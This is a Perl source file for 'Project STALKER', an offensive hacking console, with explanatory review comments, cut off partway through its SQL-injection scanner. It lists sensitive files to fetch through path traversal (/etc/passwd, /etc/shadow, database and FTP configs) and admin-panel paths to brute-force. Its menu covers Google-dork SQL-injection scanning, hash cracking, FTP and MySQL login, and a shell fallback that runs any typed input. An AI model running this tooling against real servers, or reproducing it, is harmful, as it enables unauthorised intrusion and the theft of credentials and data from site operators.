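#!/usr/bin/perl
#Project STALKER 1.0
#(C) Doddy Hackman 2012
#
# The shebang above is the only code change in this header: the original read
# "#!usr/bin/perl" (no leading slash), which the kernel cannot resolve, so the
# script could not be executed directly on a Unix host.
#
# Windows/ActivePerl install hints kept from the original. These are non-core
# modules fetched over plain HTTP from third-party mirrors; verify the source
# (or install from a trusted CPAN mirror) before trusting what they deliver.
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#http://search.cpan.org/~animator/Color-Output-1.05/Output.pm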
- use IO::Socket;
- use HTML::LinkExtor;
- use LWP::UserAgent;
- use Win32; ## Comment this line for Linux
- use Win32::OLE qw(in); ## Comment this line for Linux
- use Win32::Process; ## Comment this line for Linux
- use Net::FTP;
- use Cwd;
- use URI::Split qw(uri_split);
- use MIME::Base64;
- use DBI; ## Comment this line for Linux
- use URI::Escape;
- use Color::Output;
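# Initialise Color::Output's colour escapes used by cprint() below. The original
# paste had no terminator on this line, so the following `my @files = (...)` was
# most likely parsed as the argument list of Init(); the explicit ';' makes the
# two statements independent of each other.
Color::Output::Init;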
# Candidate file paths for the path/disclosure probe (presumably consumed by
# scanpaths(), which is not visible in this section). Order and contents are
# identical to the original quoted list, including the duplicated first entry.
# qw() is safe here because no entry contains whitespace, and a backslash inside
# qw() follows single-quote rules (it stays literal), so the Windows paths are
# byte-for-byte the same as before.
my @files = qw(
    C:/xampp/htdocs/aca.txt
    C:/xampp/htdocs/aca.txt
    C:/xampp/htdocs/admin.php
    C:/xampp/htdocs/leer.txt
    ../../../boot.ini
    ../../../../boot.ini
    ../../../../../boot.ini
    ../../../../../../boot.ini
    /etc/passwd
    /etc/shadow
    /etc/shadow~
    /etc/hosts
    /etc/motd
    /etc/apache/apache.conf
    /etc/fstab
    /etc/apache2/apache2.conf
    /etc/apache/httpd.conf
    /etc/httpd/conf/httpd.conf
    /etc/apache2/httpd.conf
    /etc/apache2/sites-available/default
    /etc/mysql/my.cnf
    /etc/my.cnf
    /etc/sysconfig/network-scripts/ifcfg-eth0
    /etc/redhat-release
    /etc/httpd/conf.d/php.conf
    /etc/pam.d/proftpd
    /etc/phpmyadmin/config.inc.php
    /var/www/config.php
    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/access.log
    /var/log/apache/error_log
    /var/log/apache/error.log
    /var/log/apache/access_log
    /var/log/apache/access.log
    /var/log/apache2/error_log
    /var/log/apache2/error.log
    /var/log/apache2/access_log
    /var/log/apache2/access.log
    /var/www/logs/error_log
    /var/www/logs/error.log
    /var/www/logs/access_log
    /var/www/logs/access.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access.log
    /var/log/error_log
    /var/log/error.log
    /var/log/access_log
    /var/log/access.log
    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /usr/lib/security/mkuser.default
    /apache/logs/access.log
    /apache/logs/error.log
    /etc/httpd/logs/acces_log
    /etc/httpd/logs/acces.log
    /var/log/httpd/access_log
    /var/log/httpd/error_log
    /apache2/logs/error.log
    /apache2/logs/access.log
    /logs/error.log
    /logs/access.log
    /usr/local/apache2/logs/access_log
    /usr/local/apache2/logs/access.log
    /usr/local/apache2/logs/error_log
    /usr/local/apache2/logs/error.log
    /var/log/httpd/access.log
    /var/log/httpd/error.log
    /opt/lampp/logs/access_log
    /opt/lampp/logs/error_log
    /opt/xampp/logs/access_log
    /opt/xampp/logs/error_log
    /opt/lampp/logs/access.log
    /opt/lampp/logs/error.log
    /opt/xampp/logs/access.log
    /opt/xampp/logs/error.log
    C:\ProgramFiles\ApacheGroup\Apache\logs\access.log
    C:\ProgramFiles\ApacheGroup\Apache\logs\error.log
    /usr/local/apache/conf/httpd.conf
    /usr/local/apache2/conf/httpd.conf
    /etc/apache/conf/httpd.conf
    /usr/local/etc/apache/conf/httpd.conf
    /usr/local/apache/httpd.conf
    /usr/local/apache2/httpd.conf
    /usr/local/httpd/conf/httpd.conf
    /usr/local/etc/apache2/conf/httpd.conf
    /usr/local/etc/httpd/conf/httpd.conf
    /usr/apache2/conf/httpd.conf
    /usr/apache/conf/httpd.conf
    /usr/local/apps/apache2/conf/httpd.conf
    /usr/local/apps/apache/conf/httpd.conf
    /etc/apache2/conf/httpd.conf
    /etc/http/conf/httpd.conf
    /etc/httpd/httpd.conf
    /etc/http/httpd.conf
    /etc/httpd.conf
    /opt/apache/conf/httpd.conf
    /opt/apache2/conf/httpd.conf
    /var/www/conf/httpd.conf
    /private/etc/httpd/httpd.conf
    /private/etc/httpd/httpd.conf.default
    /Volumes/webBackup/opt/apache2/conf/httpd.conf
    /Volumes/webBackup/private/etc/httpd/httpd.conf
    /Volumes/webBackup/private/etc/httpd/httpd.conf.default
    C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf
    C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf
    C:\ProgramFiles\xampp\apache\conf\httpd.conf
    /usr/local/php/httpd.conf.php
    /usr/local/php4/httpd.conf.php
    /usr/local/php5/httpd.conf.php
    /usr/local/php/httpd.conf
    /usr/local/php4/httpd.conf
    /usr/local/php5/httpd.conf
    /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
    /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
    /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
    /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
    /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
    /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
    /usr/local/etc/apache/vhosts.conf
    /etc/php.ini
    /bin/php.ini
    /etc/httpd/php.ini
    /usr/lib/php.ini
    /usr/lib/php/php.ini
    /usr/local/etc/php.ini
    /usr/local/lib/php.ini
    /usr/local/php/lib/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php5/lib/php.ini
    /usr/local/apache/conf/php.ini
    /etc/php4.4/fcgi/php.ini
    /etc/php4/apache/php.ini
    /etc/php4/apache2/php.ini
    /etc/php5/apache/php.ini
    /etc/php5/apache2/php.ini
    /etc/php/php.ini
    /etc/php/php4/php.ini
    /etc/php/apache/php.ini
    /etc/php/apache2/php.ini
    /web/conf/php.ini
    /usr/local/Zend/etc/php.ini
    /opt/xampp/etc/php.ini
    /var/local/www/conf/php.ini
    /etc/php/cgi/php.ini
    /etc/php4/cgi/php.ini
    /etc/php5/cgi/php.ini
    c:\php5\php.ini
    c:\php4\php.ini
    c:\php\php.ini
    c:\PHP\php.ini
    c:\WINDOWS\php.ini
    c:\WINNT\php.ini
    c:\apache\php\php.ini
    c:\xampp\apache\bin\php.ini
    c:\NetServer\bin\stable\apache\php.ini
    c:\home2\bin\stable\apache\php.ini
    c:\home\bin\stable\apache\php.ini
    /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /var/cpanel/cpanel.config
    /var/log/mysql/mysql-bin.log
    /var/log/mysql.log
    /var/log/mysqlderror.log
    /var/log/mysql/mysql.log
    /var/log/mysql/mysql-slow.log
    /var/mysql.log
    /var/lib/mysql/my.cnf
    C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
    C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
    C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
    C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
    C:\ProgramFiles\MySQL\data\hostname.err
    C:\ProgramFiles\MySQL\data\mysql.log
    C:\ProgramFiles\MySQL\data\mysql.err
    C:\ProgramFiles\MySQL\data\mysql-bin.log
    C:\MySQL\data\hostname.err
    C:\MySQL\data\mysql.log
    C:\MySQL\data\mysql.err
    C:\MySQL\data\mysql-bin.log
    C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
    C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
    C:\ProgramFiles\MySQL\my.ini
    C:\ProgramFiles\MySQL\my.cnf
    C:\MySQL\my.ini
    C:\MySQL\my.cnf
    /etc/logrotate.d/proftpd
    /www/logs/proftpd.system.log
    /var/log/proftpd
    /etc/proftp.conf
    /etc/protpd/proftpd.conf
    /etc/vhcs2/proftpd/proftpd.conf
    /etc/proftpd/modules.conf
    /var/log/vsftpd.log
    /etc/vsftpd.chroot_list
    /etc/logrotate.d/vsftpd.log
    /etc/vsftpd/vsftpd.conf
    /etc/vsftpd.conf
    /etc/chrootUsers
    /var/log/xferlog
    /var/adm/log/xferlog
    /etc/wu-ftpd/ftpaccess
    /etc/wu-ftpd/ftphosts
    /etc/wu-ftpd/ftpusers
    /usr/sbin/pure-config.pl
    /usr/etc/pure-ftpd.conf
    /etc/pure-ftpd/pure-ftpd.conf
    /usr/local/etc/pure-ftpd.conf
    /usr/local/etc/pureftpd.pdb
    /usr/local/pureftpd/etc/pureftpd.pdb
    /usr/local/pureftpd/sbin/pure-config.pl
    /usr/local/pureftpd/etc/pure-ftpd.conf
    /etc/pure-ftpd/pure-ftpd.pdb
    /etc/pureftpd.pdb
    /etc/pureftpd.passwd
    /etc/pure-ftpd/pureftpd.pdb
    /var/log/pure-ftpd/pure-ftpd.log
    /logs/pure-ftpd.log
    /var/log/pureftpd.log
    /var/log/ftp-proxy/ftp-proxy.log
    /var/log/ftp-proxy
    /var/log/ftplog
    /etc/logrotate.d/ftp
    /etc/ftpchroot
    /etc/ftphosts
    /var/log/exim_mainlog
    /var/log/exim/mainlog
    /var/log/maillog
    /var/log/exim_paniclog
    /var/log/exim/paniclog
    /var/log/exim/rejectlog
    /var/log/exim_rejectlog
);
# Relative paths tried by the admin-panel finder (presumably consumed by
# scanpanel(), which is not visible in this section). Package global: there is
# no `my`, unlike @files above.
# NOTE(review): four entries -- 'formslogin/', 'simpleLogin/', 'login-redirect/'
# and 'smblogin/' -- are split across two lines in this paste, so as written the
# string literal contains a trailing newline. Confirm against the original
# source before using them; a path with an embedded newline will never match.
@panels = (
'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx'
, 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp',
'admin/webmaster.aspx'
, 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx'
, 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/',
'login.asp', 'login.aspx'
, 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx'
, 'login/login.asp', 'login/login.aspx', 'login/admin.asp',
'login/admin.aspx'
, 'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp'
, 'administracion/login.aspx', 'administracion/webmaster.asp',
'administracion/webmaster.aspx'
, 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php'
, 'admin/index.php', 'admin/login.php', 'admin/system.php',
'admin/ingresar.php'
, 'admin/administrador.php', 'admin/default.php', 'administracion/',
'administracion/index.php'
, 'administracion/login.php', 'administracion/ingresar.php',
'administracion/admin.php'
, 'administration/', 'administration/index.php', 'administration/login.php'
, 'administrator/index.php', 'administrator/login.php',
'administrator/system.php', 'system/'
, 'system/login.php', 'admin.php', 'login.php', 'administrador.php',
'administration.php'
, 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php',
'admin2.html', 'yonetim.php'
, 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
'admin/account.php', 'admin/account.html'
, 'admin/index.html', 'admin/login.html', 'admin/home.php',
'admin/controlpanel.html'
, 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
'cp.php', 'cp.html'
, 'administrator/', 'administrator/index.html', 'administrator/login.html'
, 'administrator/account.html', 'administrator/account.php',
'administrator.html', 'login.html'
, 'modelsearch/login.php', 'moderator.php', 'moderator.html',
'moderator/login.php'
, 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
'moderator/'
, 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php',
'controlpanel.html'
, 'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
'adminpanel.html', 'admin1.asp'
, 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
'admin/home.asp'
, 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp'
, 'administrator/login.asp', 'administrator/account.asp',
'administrator.asp'
, 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp',
'moderator/admin.asp'
, 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/'
, 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html',
'sysadmin.php'
, 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/',
'ur-admin.asp'
, 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html'
, 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html'
, 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php',
'webadmin.asp'
, 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp'
, 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/'
, 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/',
'administrators/'
, 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/',
'SysAdmin/'
, 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/',
'cpanel/'
, 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/',
'formslogin/
', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/
', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/
', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/',
'smblogin/
', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/',
'bigadmin/'
, 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/',
'openvpnadmin/'
, 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/'
, 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/',
'ccp14admin/'
, 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/'
, 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/'
, 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/'
, 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/'
, 'server/', 'database_administration/', 'power_user/',
'system_administration/'
, 'ss_vms_admin_sm/'
);
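# Create the on-disk log tree next to the script (logs/webs/ is where the
# per-target files written by the menu commands go). The original tested the
# absolute path "/logs/webs" but created the relative "logs/webs", so the check
# never matched the directory it went on to create, and it passed the decimal
# literal 777 (octal 01411: sticky bit, owner read, group/other execute) as the
# mode. Both directories are now checked and created relative to the working
# directory with a mode that is not world-writable; failures are reported
# rather than ignored, but do not abort the script.
unless ( -d "logs/webs" ) {
    mkdir( "logs", 0755 ) or -d "logs" or warn "[-] mkdir logs: $!\n";
    mkdir( "logs/webs", 0755 ) or warn "[-] mkdir logs/webs: $!\n";
}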
# HTTP client shared by every web-facing command in the file. The User-Agent is
# a fixed, spoofed Firefox 2 string, reproduced byte-for-byte from the original
# (including the missing space before "Firefox"), and every request gives up
# after 5 seconds. Both options are passed to the constructor instead of being
# set afterwards.
my $nave = LWP::UserAgent->new(
    agent =>
      "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12",
    timeout => 5,
);
# Start-up sequence: banner, local host info, Ctrl-C handler, then the prompt
# loop. head() is defined outside this section.
head();
getinfo(); ## Comment this line for Linux
# NOTE(review): `\&next` is a reference to a sub named "next". No such sub is
# defined in this file (`next` is a loop keyword, not a function), so pressing
# Ctrl-C most likely makes Perl die with "Undefined subroutine &main::next"
# instead of returning to the prompt. Confirm the intended Ctrl-C behaviour.
$SIG{INT} = \&next; ## Comment on this line to compile to exe
# Main read-eval loop. menujo() handles one command per call; the only way out
# is cmd_exit, which calls exit() itself.
while (1) {
    menujo();
}
# Print the local OS name, login name and domain. Windows only: all three
# values come from the Win32 module, which the header says to comment out on
# Linux. The results are kept in the package globals $so, $login and $domain,
# exactly as before, in case code outside this section reads them.
sub getinfo {
    ( $so, $login, $domain ) =
      ( Win32::GetOSName(), Win32::LoginName(), Win32::DomainName() );
    cprint "\x0313";    # colour on
    print "\n\n"
      . join( " ", "[OS] : $so", "[Login] : $login", "[Group] : $domain" )
      . "\n\n";
    cprint "\x030";     # colour reset
}
# Read one command line from STDIN and dispatch on its "cmd_*" prefix.
# Every handler that takes an argument has the same shape: capture everything
# after the command name, drop the first space (`s/ //` removes only the first
# occurrence), and print a usage line if nothing is left.
# Anything that matches no handler is passed to system() verbatim, so this
# prompt is also an unrestricted local shell: whatever is typed runs with the
# script's privileges. The same applies to "open <file>" inside cmd_navegator.
# Helpers called here but defined outside this section: getip, whois, infocon,
# toma, get_links, helpme, getprocess, killprocess, conectar, scanpaths,
# hex_en, hex_de, download, ascii, ascii_de, base, base_de, aboutme, scanport,
# scanpanel, google, sql, ver_length, crackit, saveyes, ftp, coleccionar,
# enter, copyright.
sub menujo {
    print "\n\n";
    cprint "\x035r00t\x030"; #13
    cprint "\x033 ~ # \x030"; #13
    cprint "\x037";
    chomp( my $cmd = <stdin> );
    print "\n\n";
    ###############################################################################
    if ( $cmd eq "cmd_getinfo" ) {
        getinfo();
    }
    elsif ( $cmd =~ /cmd_getip(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_getip <host>\n";
        }
        else {
            print "\n[IP] : " . getip($te) . "\n";
            print "\n";
        }
    }
    elsif ( $cmd =~ /cmd_whois(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_whois <host>\n";
        }
        else {
            print "[+] Getting data\n\n";
            print whois($te);
            print "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_locate(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_locate <host>\n";
        }
        else {
            infocon($te);
            print "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_getlinks(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_getlinks <page>\n";
        }
        else {
            print "[+] Extracting links in the page\n\n\n";
            $code = toma($te);    # package global, also reused by the SQL subs below
            my @re = get_links($code);
            for my $url (@re) {
                print "[Link] : $url\n";
            }
            print "\n\n[+] Finish\n";
        }
    }
    elsif ( $cmd eq "cmd_help" ) {
        helpme();
    }
    elsif ( $cmd eq "cmd_getprocess" ) {
        my %re = getprocess();
        for my $data ( keys %re ) {
            # NOTE(review): $t is never assigned in this handler (the only
            # visible assignment is in menu_options), so $proceso/$pid are
            # filled from stale or undefined data and are not printed anyway.
            ( $proceso, $pid ) = ( $t =~ /(.*):(.*)/ig );
            print "[+] Proceso : " . $data . "\n";
            print "[+] PID : " . $re{$data} . "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_killprocess(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_killprocess <pid>\n";
        }
        else {
            # Nothing is printed when killprocess() reports failure.
            if ( killprocess($te) ) {
                print "[+] Process closed\n";
            }
        }
    }
    elsif ( $cmd =~ /cmd_conec(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_conec <host> <port> <command>\n";
        }
        else {
            # Silently does nothing unless exactly three space-separated
            # arguments follow the command.
            if ( $cmd =~ /cmd_conec (.*) (.*) (.*)/ ) {
                # $a and $b are sort()'s special globals; declaring them with
                # my is legal but would break any sort block in this scope.
                my ( $a, $b, $c ) = ( $1, $2, $3 );
                print conectar( $a, $b, $c );
            }
        }
    }
    elsif ( $cmd =~ /cmd_allow(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_allow <host>\n";
        }
        else {
            # Raw request on port 80; only a single CRLF is sent here, so
            # whether the header block is terminated depends on conectar().
            $re = conectar( $te, "80", "GET / HTTP/1.0\r\n" );
            if ( $re =~ /Allow:(.*)/ig ) {
                print "[+] Allow : " . $1 . "\n";
            }
            else {
                print "\n[-] Not Found\n";
            }
        }
    }
    elsif ( $cmd =~ /cmd_paths(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_paths <page>\n";
        }
        else {
            scanpaths($te);
        }
    }
    elsif ( $cmd =~ /cmd_encodehex(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_encodehex <text>\n";
        }
        else {
            print "\n\n[+] " . hex_en($te) . "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_decodehex(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_decodehex <text>\n";
        }
        else {
            print "\n\n[+] " . hex_de($te) . "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_download(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_download <url>\n";
        }
        else {
            my $file = $te;    # unused: shadowed by the inner $file below
            my ( $scheme, $auth, $path, $query, $frag ) = uri_split($te);
            # The local name is the last path segment of the URL, relative to
            # the current directory; if the path contains no "/" nothing
            # happens and nothing is printed.
            if ( $path =~ /(.*)\/(.*)$/ ) {
                my $file = $2;
                print "[+] Downloading ...\n";
                if ( download( $te, $file ) ) {
                    print "[+] File downloaded\n";
                }
            }
        }
    }
    elsif ( $cmd =~ /cmd_encodeascii(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_encodeascii <text>\n";
        }
        else {
            print "\n\n[+] " . ascii($te) . "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_decodeascii(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_decodeascii <text>\n";
        }
        else {
            print "\n\n[+] " . ascii_de($te) . "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_encodebase(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_encodebase <text>\n";
        }
        else {
            print "\n\n[+] " . base($te) . "\n\n";
        }
    }
    elsif ( $cmd =~ /cmd_decodebase(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_decodebase <text>\n";
        }
        else {
            print "\n\n[+] " . base_de($te) . "\n\n";
        }
    }
    elsif ( $cmd eq "cmd_aboutme" ) {
        aboutme();
    }
    elsif ( $cmd =~ /cmd_scanport(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_scanport <host>\n";
        }
        else {
            scanport($te);
        }
    }
    elsif ( $cmd =~ /cmd_panel(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_panel <web>\n";
        }
        else {
            scanpanel($te);
        }
    }
    elsif ( $cmd =~ /cmd_scangoogle/ ) {
        # Interactive: dork and page count are read from STDIN, google()
        # (not visible) returns candidate URLs.
        print "[Dork] : ";
        chomp( my $dork = <stdin> );
        print "\n\n[Pages] : ";
        chomp( my $pages = <stdin> );
        print "\n\n[Starting the search]\n\n";
        my @links = google( $dork, $pages );
        print "\n[Links Found] : " . int(@links) . "\n\n\n";
        print "[Starting the scan]\n\n\n";
        for my $link (@links) {
            # Greedy (.*)= keeps everything up to the LAST "=" in the URL,
            # i.e. the value of the final query parameter is dropped.
            if ( $link =~ /(.*)=/ig ) {
                my $web = $1;
                sql( $web . "=" );
            }
        }
        print "\n\n[+] Finish\n";
    }
    elsif ( $cmd =~ /cmd_getpass(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_getpass <hash>\n";
        }
        else {
            my $ha = $te;
            # ver_length() and crackit() are not visible here; crackit()
            # signals a miss with the sentinel "false01". Hits are appended
            # to logs/hashes-found.txt as hash:plaintext.
            if ( ver_length($ha) ) {
                print "[+] Cracking Hash...\n";
                my $re = crackit($ha);
                unless ( $re =~ /false01/ ) {
                    print "\n\n[+] Cracked : $re\n\n";
                    saveyes( "logs/hashes-found.txt", $ha . ":" . $re );
                }
                else {
                    print "\n[-] Not Found\n\n";
                }
            }
            else {
                print "\n\n[-] Hash invalid\n\n";
            }
        }
    }
    elsif ( $cmd =~ /cmd_ftp(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_ftp <host> <user> <pass>\n";
        }
        else {
            # Credentials are taken from the command line as typed.
            if ( $cmd =~ /cmd_ftp (.*) (.*) (.*)/ ) {
                ftp( $1, $2, $3 );
            }
        }
    }
    elsif ( $cmd eq "cmd_navegator" ) {
        # Minimal file browser implemented as a goto loop on the "nave"
        # label. Sub-commands are matched with unanchored regexes and are
        # not mutually exclusive (plain `if`s), so one line can trigger
        # several of them.
        nave:
        print getcwd() . ">";
        chomp( my $rta = <stdin> );
        print "\n\n";
        if ( $rta =~ /list/ ) {
            my @files = coleccionar( getcwd() );    # lexical; shadows the file-level @files
            for (@files) {
                if ( -f $_ ) {
                    print "[File] : " . $_ . "\n";
                }
                else {
                    print "[Directory] : " . $_ . "\n";
                }
            }
        }
        if ( $rta =~ /cd (.*)/ ) {
            my $dir = $1;
            if ( chdir($dir) ) {
                print "\n[+] Directory changed\n";
            }
            else {
                print "\n[-] Error\n";
            }
        }
        if ( $rta =~ /del (.*)/ ) {
            # No confirmation: unlink for files, rmdir for anything else.
            my $file = getcwd() . "/" . $1;
            if ( -f $file ) {
                if ( unlink($file) ) {
                    print "\n[+] File Deleted\n";
                }
                else {
                    print "\n[-] Error\n";
                }
            }
            else {
                if ( rmdir($file) ) {
                    print "\n[+] Directory Deleted\n";
                }
                else {
                    print "\n[-] Error\n";
                }
            }
        }
        if ( $rta =~ /rename (.*) (.*)/ ) {
            if ( rename( getcwd() . "/" . $1, getcwd() . "/" . $2 ) ) {
                print "\n[+] File Changed\n";
            }
            else {
                print "\n[-] Error\n";
            }
        }
        if ( $rta =~ /open (.*)/ ) {
            # "open" is a shell call on the typed text, not a file open:
            # the argument goes to system() unchanged.
            my $file = $1;
            chomp $file;
            system($file);
            #system(getcwd()."/".$file);
        }
        if ( $rta eq "help" ) {
            print "\nCommands :
help
cd <dir>
list
del <del>
rename <file1> <file2>
open <file>
exit
\n\n";
        }
        if ( $rta eq "exit" ) {
            # `next` inside a sub unwinds to the caller's while(1) loop
            # (Perl warns "Exiting subroutine via next" under warnings).
            next;
        }
        print "\n\n";
        goto nave;
    }
    elsif ( $cmd =~ /cmd_kobra(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_kobra <page>\n";
        }
        else {
            my $url = $te;
            chomp $url;
            scansqli( $url, "--" );    # "--" is the bypass style handed to bypass()
        }
    }
    elsif ( $cmd =~ /cmd_mysql(.*)/ ) {
        my $te = $1;
        $te =~ s/ //;
        if ( $te eq "" or $te eq " " ) {
            print "\n[+] sintax : cmd_mysql <host> <user> <pass>\n";
        }
        else {
            if ( $cmd =~ /cmd_mysql (.*) (.*) (.*)/ ) {
                enter( $1, $2, $3 );
            }
        }
    }
    elsif ( $cmd eq "cmd_exit" ) {
        copyright();
        <stdin>;    # wait for a keypress
        exit(1);    # note: exits with status 1 even on a normal quit
    }
    else {
        # Unrecognised input is executed by the shell as typed.
        system($cmd);
    }
    cprint "\x030";
    #####################################################################################
}
# Decide whether $_[0] (a URL ending in the injectable parameter) is worth
# pursuing with bypass style $_[1], then hand off to motor() or -- when the URL
# already carries the "hackman" column placeholder -- straight to the menu.
# The test compares the whole page returned for "and 1=0" with the one for
# "and 1=1"; any difference counts as "vulnerable", so pages with dynamic
# content (timestamps, rotating banners) will be reported as hits.
# NOTE(review): bypass() is unpacked into ($pass1, $bypass2) but the probes
# append $pass2, so the suffix used here is whatever an earlier call left in the
# package global $pass2 (undef on the first run). $pass, passed to
# menu_options(), is not assigned anywhere in the visible part of this file.
# bypass(), partimealmedio(), savefile() and toma() are defined elsewhere.
sub scansqli {
    my $page = $_[0];
    print "[Status] : Scanning.....\n";
    ( $pass1, $bypass2 ) = &bypass( $_[1] );
    my $save = partimealmedio( $_[0] );    # log basename derived from the URL
